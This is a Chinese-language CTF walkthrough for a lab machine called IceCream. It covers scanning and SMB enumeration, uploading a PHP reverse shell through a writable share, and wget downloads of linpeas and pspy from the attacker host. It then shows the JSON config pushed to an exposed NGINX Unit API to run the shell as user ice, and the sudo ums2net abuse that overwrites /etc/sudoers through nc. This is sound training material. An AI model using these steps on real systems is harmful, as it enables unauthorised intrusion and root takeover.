IceCream
信息搜集
端口扫描
┌──(kali💀kali)-[~/temp/IceCream]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.101:22
Open 192.168.10.101:80
Open 192.168.10.101:139
Open 192.168.10.101:445
Open 192.168.10.101:9000
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOo0aMrFKUdos1+tMkValDaSFRx0lOy7VE4akDQlO9DGQDNT0aT5JCXm9jcgHk7mne7bxPG2jUBms8n2O1iQNyI=
| 256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPDdtb0wbP+/g4yk5RfteqQ3ho372gC6QdawREJ+y9Eb
80/tcp open http syn-ack nginx 1.22.1
|_http-title: 403 Forbidden
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.22.1
139/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
9000/tcp open cslistener? syn-ack
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 07:17:15 GMT
| Content-Type: application/json
| Content-Length: 40
| Connection: close
| "error": "Value doesn't exist."
| GetRequest:
| HTTP/1.1 200 OK
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 07:17:15 GMT
| Content-Type: application/json
| Content-Length: 1042
| Connection: close
| "certificates": {},
| "js_modules": {},
| "config": {
| "listeners": {},
| "routes": [],
| "applications": {}
| "status": {
| "modules": {
| "python": {
| "version": "3.11.2",
| "lib": "/usr/lib/unit/modules/python3.11.unit.so"
| "php": {
| "version": "8.2.18",
| "lib": "/usr/lib/unit/modules/php.unit.so"
| "perl": {
| "version": "5.36.0",
| "lib": "/usr/lib/unit/modules/perl.unit.so"
| "ruby": {
| "version": "3.1.2",
| "lib": "/usr/lib/unit/modules/ruby.unit.so"
| "java": {
| "version": "17.0.11",
| "lib": "/usr/lib/unit/modules/java17.unit.so"
| "wasm": {
| "version": "0.1",
| "lib": "/usr/lib/unit/modules/wasm.unit.so"
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 07:17:15 GMT
| Content-Type: application/json
| Content-Length: 35
| Connection: close
|_ "error": "Invalid method."
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9000-TCP:V=7.94SVN%I=7%D=10/9%Time=67062DF9%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,4A8,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Unit/1\.33\.0\r\n
SF:Date:\x20Wed,\x2009\x20Oct\x202024\x2007:17:15\x20GMT\r\nContent-Type:\
SF:x20application/json\r\nContent-Length:\x201042\r\nConnection:\x20close\
SF:r\n\r\n{\r\n\t\"certificates\":\x20{},\r\n\t\"js_modules\":\x20{},\r\n\
SF:t\"config\":\x20{\r\n\t\t\"listeners\":\x20{},\r\n\t\t\"routes\":\x20\[
SF:\],\r\n\t\t\"applications\":\x20{}\r\n\t},\r\n\r\n\t\"status\":\x20{\r\
SF:n\t\t\"modules\":\x20{\r\n\t\t\t\"python\":\x20{\r\n\t\t\t\t\"version\"
SF::\x20\"3\.11\.2\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/modules/pytho
SF:n3\.11\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"php\":\x20{\r\n\t\t\t\t\"
SF:version\":\x20\"8\.2\.18\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/modu
SF:les/php\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"perl\":\x20{\r\n\t\t\t\t
SF:\"version\":\x20\"5\.36\.0\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/mo
SF:dules/perl\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"ruby\":\x20{\r\n\t\t\
SF:t\t\"version\":\x20\"3\.1\.2\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/
SF:modules/ruby\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"java\":\x20{\r\n\t\
SF:t\t\t\"version\":\x20\"17\.0\.11\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/u
SF:nit/modules/java17\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"wasm\":\x20{\
SF:r\n\t\t\t\t\"version\":\x20\"0\.1\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/
SF:unit/modules/wasm\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t")%r(HTTPOptions,C
SF:7,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x20Unit/1\.3
SF:3\.0\r\nDate:\x20Wed,\x2009\x20Oct\x202024\x2007:17:15\x20GMT\r\nConten
SF:t-Type:\x20application/json\r\nContent-Length:\x2035\r\nConnection:\x20
SF:close\r\n\r\n{\r\n\t\"error\":\x20\"Invalid\x20method\.\"\r\n}\r\n")%r(
SF:FourOhFourRequest,C3,"HTTP/1\.1\x20404\x20Not\x20Found\r\nServer:\x20Un
SF:it/1\.33\.0\r\nDate:\x20Wed,\x2009\x20Oct\x202024\x2007:17:15\x20GMT\r\
SF:nContent-Type:\x20application/json\r\nContent-Length:\x2040\r\nConnecti
SF:on:\x20close\r\n\r\n{\r\n\t\"error\":\x20\"Value\x20doesn't\x20exist\.\
SF:"\r\n}\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-10-09T07:17:16
|_ start_date: N/A
|_clock-skew: 1s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 16534/tcp): CLEAN (Couldn't connect)
| Check 2 (port 30933/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19523/udp): CLEAN (Failed to receive data)
| Check 4 (port 16915/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: ICECREAM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ICECREAM<00> Flags: <unique><active>
| ICECREAM<03> Flags: <unique><active>
| ICECREAM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
目录扫描
┌──(kali💀kali)-[~/temp/IceCream]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.101
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 301,401,403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 6988 / 441122 (1.58%)[ERROR] Get "http://192.168.10.101/sed.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 23352 / 441122 (5.29%)[ERROR] Get "http://192.168.10.101/Real_Estate": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.10.101/growth.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.10.101/2488": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 28289 / 441122 (6.41%)
[!] Keyboard interrupt detected, terminating.
Progress: 28323 / 441122 (6.42%)
===============================================================
Finished
===============================================================
漏洞发现
踩点
┌──(kali💀kali)-[~/temp/IceCream]
└─$ whatweb http://$IP
http://192.168.10.101 [403 Forbidden] Country[RESERVED][ZZ], HTTPServer[nginx/1.22.1], IP[192.168.10.101], Title[403 Forbidden], nginx[1.22.1]
┌──(kali💀kali)-[~/temp/IceCream]
└─$ curl http://192.168.10.101:9000/
{
"certificates": {},
"js_modules": {},
"config": {
"listeners": {},
"routes": [],
"applications": {}
},
"status": {
"modules": {
"python": {
"version": "3.11.2",
"lib": "/usr/lib/unit/modules/python3.11.unit.so"
},
"php": {
"version": "8.2.18",
"lib": "/usr/lib/unit/modules/php.unit.so"
},
"perl": {
"version": "5.36.0",
"lib": "/usr/lib/unit/modules/perl.unit.so"
},
"ruby": {
"version": "3.1.2",
"lib": "/usr/lib/unit/modules/ruby.unit.so"
},
"java": {
"version": "17.0.11",
"lib": "/usr/lib/unit/modules/java17.unit.so"
},
"wasm": {
"version": "0.1",
"lib": "/usr/lib/unit/modules/wasm.unit.so"
},
"wasm-wasi-component": {
"version": "0.1",
"lib": "/usr/lib/unit/modules/wasm_wasi_component.unit.so"
}
},
"connections": {
"accepted": 0,
"active": 0,
"idle": 0,
"closed": 0
},
"requests": {
"total": 0
},
"applications": {}
}
}
敏感端口测试
┌──(kali💀kali)-[~/temp/IceCream]
└─$ enum4linux -a $IP
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct 9 03:21:44 2024
=========================================( Target Information )=========================================
Target ........... 192.168.10.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.10.101 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.10.101 )===============================
Looking up status of 192.168.10.101
ICECREAM <00> - B <ACTIVE> Workstation Service
ICECREAM <03> - B <ACTIVE> Messenger Service
ICECREAM <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 192.168.10.101 )==================================
[+] Server 192.168.10.101 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.10.101 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.10.101 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.10.101 from srvinfo:
ICECREAM Wk Sv PrQ Unx NT SNT Samba 4.17.12-Debian
platform_id : 500
os version : 6.1
server type : 0x809a03
======================================( Users on 192.168.10.101 )======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
================================( Share Enumeration on 192.168.10.101 )================================
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
icecream Disk tmp Folder
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.10.101 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.10.101
//192.168.10.101/print$ Mapping: DENIED Listing: N/A Writing: N/A
//192.168.10.101/icecream Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_CONNECTION_REFUSED listing \*
//192.168.10.101/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//192.168.10.101/nobody Mapping: DENIED Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.10.101 )===========================
[+] Attaching to 192.168.10.101 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] ICECREAM
[+] Builtin
[+] Password Info for Domain: ICECREAM
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.10.101 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.10.101 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-780586060-1811573838-1416508090 and logon username '', password ''
S-1-5-21-780586060-1811573838-1416508090-501 ICECREAM\nobody (Local User)
S-1-5-21-780586060-1811573838-1416508090-513 ICECREAM\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\ice (Local User)
==============================( Getting printer info for 192.168.10.101 )==============================
No printers returned.
┌──(kali💀kali)-[~/temp/IceCream]
└─$ smbmap -H $IP
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.10.101:445 Name: lookup.hmv Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
icecream READ, WRITE tmp Folder
IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)
nobody NO ACCESS Home Directories
都显示有一个可读写目录!前面的域名解析忘了删掉了。。。
┌──(kali💀kali)-[~/temp/IceCream]
└─$ nbtscan $IP
Doing NBT name scan for addresses from 192.168.10.101
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.10.101 ICECREAM <server> ICECREAM 00:00:00:00:00:00
以及9000
端口的测试:
https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi
以及 https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
但是未果,查询一下,发现是:
登录smb
登录以后尝试反弹shell!
┌──(kali💀kali)-[~/temp/IceCream]
└─$ vim revshell.php
┌──(kali💀kali)-[~/temp/IceCream]
└─$ ls -la
total 28
drwxr-xr-x 2 kali kali 4096 Oct 9 03:46 .
drwxr-xr-x 136 kali kali 4096 Oct 9 02:52 ..
-rw-r--r-- 1 kali kali 8575 Oct 9 03:37 exp.py
-rwxr-xr-x 1 kali kali 492 Oct 9 03:35 exp.sh
-rw-r--r-- 1 kali kali 3912 Oct 9 03:46 revshell.php
┌──(kali💀kali)-[~/temp/IceCream]
└─$ chmod +x revshell.php
┌──(kali💀kali)-[~/temp/IceCream]
└─$ smbclient //$IP/ICECREAM -U ICECREAM
Password for [WORKGROUP\ICECREAM]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Oct 9 03:39:01 2024
.. D 0 Sun Oct 6 06:06:38 2024
systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC D 0 Wed Oct 9 03:15:49 2024
.font-unix DH 0 Wed Oct 9 03:15:48 2024
systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f D 0 Wed Oct 9 03:15:48 2024
.XIM-unix DH 0 Wed Oct 9 03:15:48 2024
.ICE-unix DH 0 Wed Oct 9 03:15:48 2024
.X11-unix DH 0 Wed Oct 9 03:15:48 2024
19480400 blocks of size 1024. 16156948 blocks available
smb: \> pwd
Current directory is \\192.168.10.101\ICECREAM\
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> put revshell.php
putting file revshell.php as \revshell.php (764.0 kb/s) (average 764.1 kb/s)
smb: \> ls
. D 0 Wed Oct 9 03:47:43 2024
.. D 0 Sun Oct 6 06:06:38 2024
systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC D 0 Wed Oct 9 03:15:49 2024
.font-unix DH 0 Wed Oct 9 03:15:48 2024
systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f D 0 Wed Oct 9 03:15:48 2024
.XIM-unix DH 0 Wed Oct 9 03:15:48 2024
.ICE-unix DH 0 Wed Oct 9 03:15:48 2024
.X11-unix DH 0 Wed Oct 9 03:15:48 2024
revshell.php A 3912 Wed Oct 9 03:47:43 2024
19480400 blocks of size 1024. 16156944 blocks available
然后访问激活一下即可!
http://192.168.10.101/revshell.php
提权
信息搜集
(remote) www-data@icecream:/$ cd /var/tmp
(remote) www-data@icecream:/var/tmp$ wget http://192.168.10.102:8888/linpeas.sh
(remote) www-data@icecream:/var/tmp$ wget http://192.168.10.102:8888/pspy64
(remote) www-data@icecream:/var/tmp$ chmod +x *
看一下有啥信息:
添加路由监听提权ice
Todd
师傅找到了一个加路由的办法!尝试按图索骥一下!
发现存在使用PUT进行更新的办法:
根据官网下面的样例,尝试创建一个配置文件上传:
{
"listeners": {
"127.0.0.1:8080": {
"pass": "routes"
}
},
"routes": [
{
"action": {
"share": "/tmp/revshell.php",
"pass": "applications/shellapp"
}
}
],
"applications": {
"shellapp": {
"type": "php",
"user": "/tmp",
"index": "revshell.php",
"script": "revshell.php"
}
}
}
然后报错了。。。
现尝试使用之前的权限,调整了一下,先使用之前的权限写入的shell,再传配置文件:
{
"listeners": {
"127.0.0.1:8080": {
"pass": "routes"
}
},
"routes": [
{
"action": {
"pass": "applications/shellapp"
}
}
],
"applications": {
"shellapp": {
"type": "php",
"user": "/tmp",
"index": "revshell.php",
"script": "revshell.php"
}
}
}
然后:
┌──(kali💀kali)-[~/temp/IceCream]
└─$ curl -X PUT --data-binary @shell.json http://192.168.10.102:9000/config
{
"error": "Invalid configuration.",
"detail": "Required parameter \"root\" is missing."
}
再次修改:
{
"listeners": {
"127.0.0.1:8080": {
"pass": "routes"
}
},
"routes": [
{
"action": {
"pass": "applications/shellapp"
}
}
],
"applications": {
"shellapp": {
"type": "php",
"root": "/tmp",
"index": "revshell.php",
"script": "revshell.php"
}
}
}
┌──(kali💀kali)-[~/temp/IceCream]
└─$ curl -X PUT --data-binary @shell.json http://192.168.10.102:9000/config
{
"success": "Reconfiguration done."
}
然后无法访问,重启,重新上传shell,调整了一下,拿下user:
提权root
查看一下这是啥:
USB Mass Storage to Network Proxy (ums2net)
ums2net provides a way for a user to connect from a network connection to a USB mass storage device.
Build
- cmake .
- make
How to use ums2net
- Insert the USB Mass Storage. Check /dev/disk/by-id/ for the unique path for that device.
- Create a config file base on the above path. Please see the config file format section.
- Run "ums2net -c ". ums2net will become a daemon in the background. For debugging please add "-d" option to avoid detach.
- Use nc to write your image to the USB Mass Storage device. For example, "nc -N localhost 29543 < warp7.img"
Config file
Each line in the config file maps a TCP port to a device. All the options are separated by space. The first argument is a number represents the TCP port. And the rest of the arguments are in dd-style. For example,
A line in the config file:
"29543 of=/dev/disk/by-id/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 bs=4096"
It means TCP port 29543 is mapped to /dev/disk/by-id/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 and the block size is 4096.
Currently we only support "of" and "bs".
写的是USB通过tcp共享数据,尝试反过来进行修改一下sudoers
文件:
echo "1234 of=/etc/sudoers bs=4096" > config
sudo /usr/sbin/ums2net -c config -d
然后本地通过nc传过去就行了:
echo 'ice ALL=(ALL) NOPASSWD: ALL' |nc $IP 1234
拿下root。